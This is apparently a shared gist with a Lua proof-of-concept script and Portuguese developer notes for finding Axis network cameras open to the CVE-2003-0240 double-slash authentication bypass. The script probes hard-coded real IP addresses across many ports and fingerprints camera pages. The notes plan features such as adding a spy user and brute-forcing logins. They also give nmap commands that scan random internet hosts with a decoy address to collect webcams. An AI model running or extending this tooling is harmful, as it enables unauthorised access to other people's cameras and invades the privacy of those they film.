POC Request Axis Cam ( CVE: CVE-2003-0240 )

requestCamAxisPOC.lua

--[[  
-- BY MrCl0wnLab & r00t-3xp10it
-- https://gist.github.com/MrCl0wnLab
axis-network-camera-http-authentication-bypass

https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass

CVE: CVE-2003-0240

Vulnerability Description:

An Axis Network Camera captures and transmits live images directly over an IP network 
(e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera 
from a Web browser on any computer. For more information see http://www.axis.com
After setting up the Axis Camera, the user is provided with Web-based Administration 
Tools for configuring and managing the camera by accessing http://camera-ip/admin/admin.shtml, 
which requires a username and password.

We have discovered the following security vulnerability: by accessing h
ttp://camera-ip//admin/admin.shtml (notice the double slash) the authentication 
for "admin" is bypassed and an attacker gains direct access to the configuration.
Using this vulnerability, an attacker can reset the root password, then enable 
the telnet server by modifying configuration files, giving the attacker interactive
access to a Unix like command line, allowing her to execute arbitrary commands as root.

Vulnerable Packages:

. AXIS 2100 Network Camera versions 2.32 and previous
. AXIS 2110 Network Camera versions 2.32 and previous
. AXIS 2120 Network Camera versions 2.32 and previous
. AXIS 2130 PTZ Network Camera versions 2.32 and previous
. AXIS 2400 Video Server versions 2.32 and previous
. AXIS 2401 Video Server versions 2.32 and previous
. AXIS 2420 Network Camera versions 2.32 and previous
. AXIS 2460 Network DVR versions 3.00 and previous
. AXIS 250S Video Server versions 3.02 and previous

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21492
---------------------------------------------------

Axis Network Camera HTTP Authentication Bypass Vulnerability
Bugtraq ID: | 7652
Class: | Access Validation Error
CVE: | CVE-2003-0240
Remote: | Yes
Local: | No
Published: | May 27 2003 12:00AM
Updated: | Jul 11 2009 10:06PM
TITLE LIST:

Axis 2420 Video Server 2.32
Axis 2420 Network Camera 2.32
Axis 2420 Network Camera 2.31
Axis 2420 Network Camera 2.30
Axis 2401 Video Server 2.32
Axis 2401 Video Server 2.31
Axis 2401 Video Server 2.30
Axis 2400 Video Server 2.32
Axis 2400 Video Server 2.31
Axis 2400 Video Server 2.30
Axis 2130 PTZ Network Camera 2.32
Axis 2130 PTZ Network Camera 2.31
Axis 2130 PTZ Network Camera 2.30
Axis 2120 Network Camera 2.32
Axis 2120 Network Camera 2.31
Axis 2120 Network Camera 2.30
Axis 2110 Network Camera 2.32
Axis 2110 Network Camera 2.31
Axis 2110 Network Camera 2.30
Axis 2100 Network Camera 2.32
Axis 2100 Network Camera 2.31
Axis 2100 Network Camera 2.30
Axis 2100 Network Camera 2.34

URI:

    /admin/admin.shtml
https://www.securityfocus.com/bid/7652/info
---------------------------------------------------
]]--

-- DEPENDENCIES (lua libraries) --
local http = require("socket.http")
local string = require("string")
local os = require("os")
local ltn12 = require("ltn12")
local options = {header={}}
local title ,result,uri_list,green_color,by_module,f,uri,check,
yellow_color,white_color,error_color,reset_color,colors,ports,targetPort

uri = "http://216.99.115.136"  --> target teste1 
uri = "http://185.32.182.75"  --> target teste2 
uri = "http://www.google.com.br"  --> target teste3 

options['header']['User-Agent'] = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own...
options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv"  --> use en-GB as attacker default install language
options['header']['Cache-Control'] = "no-store"             -->  Instruct webserver to not write it to disk (do not to cache it)

ports = { 80, 81, 82, 83, 84, 85, 86, 92, 8080, 8081, 8082, 8083, 8084, 48624, 55752,55754,55756 }

-- SET VALUES COLOR TERMINAL USE IN FUNCTION --
colors = {
    -- attributes
    reset = 0,
    clear = 0,
    bright = 1,
    dim = 2,
    underscore = 4,
    blink = 5,
    reverse = 7,
    hidden = 8,
  
    -- foreground
    black = 30,
    red = 31,
    green = 32,
    yellow = 33,
    blue = 34,
    magenta = 35,
    cyan = 36,
    white = 37,
  
    -- background
    onblack = 40,
    onred = 41,
    ongreen = 42,
    onyellow = 43,
    onblue = 44,
    onmagenta = 45,
    oncyan = 46,
    onwhite = 47,
}

-- FUNCTION SET COLOR TERMINAL --
local function makecolor(value)
    value =  string.char(27) .. '[1;' .. tostring(value) .. 'm'
  return value
end

-- SET VALUES COLOR TERMINAL --
green_color = makecolor(colors.green)
white_color = makecolor(colors.white)
error_color = makecolor(colors.red)   
reset_color = makecolor(colors.reset)
yellow_color = makecolor(colors.yellow)
  
-- COLORING MADE BY MODULE --
by_module = white_color.."MrCl0wnLab"..reset_color

uri_list = {
  -- URI AXIS
  "/indexFrame.shtml",
  "/view/viewer_index.shtml",
  "/view/index.shtml",
  "/view/view.shtml",
  "/ViewerFrame.shtml",
  "/MultiCameraFrame",
  "/view/index2.shtml",
  "/RecordFrame?",
  "/index.shtml",
  "/admin/admin.shtml",
  "/indexFrame.shtml",
  "/visitor_center/i-cam.html",
  "/webcam/view.shtml",
  "/webcam_code.php",
  "/stadscam/Live95j.asp",
  "/sub06/cam.php",
  "/CgiStart",
  "/cgi-bin/blank.php?strona="

}

-- FUNCTION REQUEST ARRAY URI --
function requestCam(uri,uri_list,header_op)
    local t = {}
    print(string.format("| %sFiles's:%s",yellow_color,reset_color)) 
    for i, intable in pairs(uri_list) do
        local body, statusCode, headers, statusText = http.request{
            url=uri..intable, sink = ltn12.sink.table(t)
        }
        if(statusCode == 200) then
            print(string.format("| [%s].....: %s%s", statusCode,uri,intable))
            -- RETURN ARRAY VALUES --
            return {http_body=table.concat(t),http_code=statusCode,http_header=headers,http_status=statusText,http_uri=uri..intable}
        else
            print(string.format("| [%s].....: %s%s",statusCode,uri,intable)) 
            t = {}
        end    
    end
    print(string.format("|\n|\n|      [ABORT]: %sNone Match (uri) has been found in AXISwebcam-recon db.%s\n|\n",error_color,reset_color)) 
    os.execute("sleep 1") 
end 

-- BANNER --
print("\n\tBY MrCl0wnLab")
print("\thttps://gist.github.com/MrCl0wnLab")
print("\tCheck: Axis Network Camera HTTP Authentication Bypass Vulnerability")

-- EXEC REQUESTS --
print(string.format("\n| %sPort's:%s", yellow_color,reset_color))
for p, port in pairs(ports) do
    targetPort = uri..":"..port
    print(string.format("| Testing...: %s%s",port,reset_color)) 
    -- TEST PORT REQUESTS --
    r,c,h  = http.request(targetPort)
    if(c == 200) then
        print("|_")
        -- REQUEST FILES webcam --
        result = requestCam(targetPort,uri_list,options)
        break
    end
end

if(result~=nil) then

    -- PRINT HEADER HTTP --
    print(string.format("|_\n| %sHeader:%s",yellow_color,reset_color)) 
    for i, intable in pairs(result.http_header) do
        print(string.format("| [%s] => %s",i,intable)) 
    end

    -- GREP TITLE --
    title = string.match(result.http_body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
    print(string.format("|_\n| %sAXISwebcam-recon:%s",yellow_color,reset_color))
    print(string.format("| %sTitle:%s%s",yellow_color,title,reset_color))

     -- List {table} of HTTP TITLE tags -
    tbl = {"AXIS Video Server", 
    "Network Camera TUCCAM1", 
    "Network Camera NetworkCamera", 
    "Network Camera Hwy285/cr43", 
    "Network Camera Capitanía", 
    "Live View / - AXIS", 
    "Live view / - AXIS 205 version 4.03", 
    "Live view / - AXIS 205 Network Camera version 4.05", 
    "Live view / - AXIS 205 Network Camera version 4.05.1", 
    "Live view / - AXIS 205 Network Camera version 4.04", 
    "Live view - AXIS P5534-E Network Camera", 
    "Live view - AXIS 213 PTZ Network Camera version 4.12",
    "Live view - AXIS 206M Network Camera version 4.11", 
    "Live view  - AXIS P1354 Network Camera", 
    "Live view  - AXIS P1344 Network Camera", 
    "Live view  - AXIS M1114 Network Camera", 
    "Live view  - AXIS M1103 Network Camera", 
    "Live view  - AXIS M1025 Network Camera", 
    "Live view  - AXIS 240Q Video Server", 
    "Live view  - AXIS 221 Network Camera", 
    "Live view  - AXIS 215 PTZ Network Camera", 
    "Live view  - AXIS 214 PTZ Network Camera", 
    "Live view  - AXIS 213 PTZ Network Camera", 
    "Live view  - AXIS 211 Network Camera", 
    "Live view  - AXIS 211 Network Camera version 4.11", 
    "Live view  - AXIS 211 Network Camera version 4.10", 
    "AXIS V5914 PTZ Network Camera 5.75.1.11", 
    "AXIS Q7401 Video Encoder 5.51.5.1", 
    "AXIS Q6045-E Network Camera", 
    "AXIS Q6045-E Mk II Network Camera", 
    "AXIS Q6044-E Network Camera", 
    "AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4", 
    "AXIS Q6034-E PTZ Dome Network Camera 5.41.4", 
    "AXIS Q3505 Fixed Dome Network Camera 6.30.1.1", 
    "AXIS Q1765-LE Network Camera 5.55.2.3", 
    "AXIS Q1615 Network Camera", 
    "AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2", 
    "AXIS P5635-E Mk II Network Camera", 
    "AXIS P5534 PTZ Dome Network Camera 5.51.5", 
    "AXIS P5514 Network Camera", 
    "AXIS P3354 Fixed Dome Network Camera 5.40.17", 
    "AXIS P1435-LE Network Camera", 
    "AXIS P1425-LE Network Camera", 
    "AXIS P1365 Mk II Network Camera", 
    "AXIS P1357 Network Camera", 
    "AXIS P1354 Fixed Network Camera 6.50.3", 
    "AXIS P1354 Fixed Network Camera 5.60.1", 
    "AXIS P1353 Network Camera 6.50.2.3", 
    "AXIS M5013 Network Camera", 
    "AXIS M3026 Network Camera", 
    "AXIS M3004 Network Camera 5.51.5.1", 
    "AXIS M2025-LE Network Camera 8.50.1", 
    "AXIS M1145-L Network Camera 6.50.3", 
    "AXIS M1124 Network Camera", 
    "AXIS F34 Network Camera 6.50.2.3", 
    "AXIS 243Q(2) Blade 4.45", 
    "Axis 2420 Video Server 2.32",
    "Axis 2420 Network Camera 2.32",
    "Axis 2420 Network Camera 2.31",
    "Axis 2420 Network Camera 2.30",
    "Axis 2401 Video Server 2.32",
    "Axis 2401 Video Server 2.31",
    "Axis 2401 Video Server 2.30",
    "AXIS 2400 Video Server", 
    "Axis 2400 Video Server 2.32",
    "Axis 2400 Video Server 2.31",
    "Axis 2400 Video Server 2.30",
    "AXIS 214 PTZ Network Camera 4.49", 
    "Axis 2130 PTZ Network Camera 2.32",
    "Axis 2130 PTZ Network Camera 2.31",
    "Axis 2130 PTZ Network Camera 2.30",
    "Axis 2120 Network Camera 2.34", 
    "Axis 2120 Network Camera 2.32",
    "Axis 2120 Network Camera 2.31",
    "Axis 2120 Network Camera 2.30",
    "Axis 2110 Network Camera 2.32",
    "Axis 2110 Network Camera 2.31",
    "Axis 2110 Network Camera 2.30",
    "Axis 2100 Network Camera 2.34",
    "Axis 2100 Network Camera 2.32",
    "Axis 2100 Network Camera 2.31",
    "Axis 2100 Network Camera 2.30"}

    -- COUNT TOTAL ARRAY TITLE
    local count = { i=0 , t=0 }
    for i, intable in ipairs(tbl) do
        count.t = count.t+1
    end 

    -- TEST TITLE --
    for i, intable in ipairs(tbl) do
        local validar = string.match(title, intable)
        if(title == intable) then
            print(string.format("|\n|\n|      STATUS...: %sAXIS WEBCAM FOUND%s",green_color,reset_color))
            print(string.format("|      TITLE...: %s%s%s",green_color,intable,reset_color))
            print(string.format("|      WEBCAM ACCESS...: %s%s%s",green_color,result.http_uri,reset_color))
            print(string.format("|      Module Author...: %s\n|\n",by_module))
            break --> break execution (loop) if a match string its found.
        else
            print(string.format("| [%s] TESTING...: %s",count.i,intable))
            os.execute("sleep 0.5")
            count.i = count.i+1
            if (count.i == count.t) then --> why ? Because its the number of TITLE tags present in the {table} list.
              return print(string.format("|\n|\n|      STATUS...: %sNONE AXIS WEBCAM FOUND%s\n     Module Author...: %s\n\n",error_color,reset_color,by_module)) 
            end
        end
    end 

end

neste exemplo esqueceste-te de 'declarar' a variavel uri que vai ser precissa mais a frente no script

ìf (code == 200)
   uri = intable
end

Proximas functions:

via painel /admin/admin.shtml

• Check Version via: file CGI and header['server']
• Set Faixa IP
• Save Vulns
• Set Faixa IP x Pais
• Grep Users
• Add User Spy
• Grep Time Zone
• Grep Network - TCP/IP
• Return Geolocation ip
• Usar API Showda Select=axis
• Brute Force

Cleiton experimentando o switch -iR do nmap deparei-me com um erro de execuçao do nosso script ..

• Repoduçao:
  • nmap -sS -v -Pn -n -T4 -O -iR 500 -p 92,8080-8082 --open --reason --script=AXISwebcam-recon.nse -oN webcams_reports.txt
  • Quando o nosso script encontra 'authentication logins' nao consegue correr a 'TITLE' search function contra esse host
  • Mas continua a correr a funcçao toda (uri search & title search) contra os outros alvos encontados (not auth)..
  • Final Notes: se quisermos fazer um nse para fazer brute-force contra http auth,,, basta procurar-mos por [401] error code ;)

SourceCode Update

r00t-3xp10it - AXISwebcam-recon.nse

screenshots

• Auth login found
  
  
• Running againts multiple targets (auth target also in host table)
  
  
  
• running -iR nmap switch == More error codes (sourcecode update)
  
• i also have added a new user input option modem=true demonstration how to capture http modem login pages.
  

Final Notes:

Version 1.9 its only available in my gist here I didnt updated my oficial repo with this changes..

• Try This:: WAN Random Search + Syn Ack + Decoy Ip addr
  sudo nmap -sS -v -Pn -n -T5 -iR 700 -p 8080-8086 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3 -oN webcam_reports.txt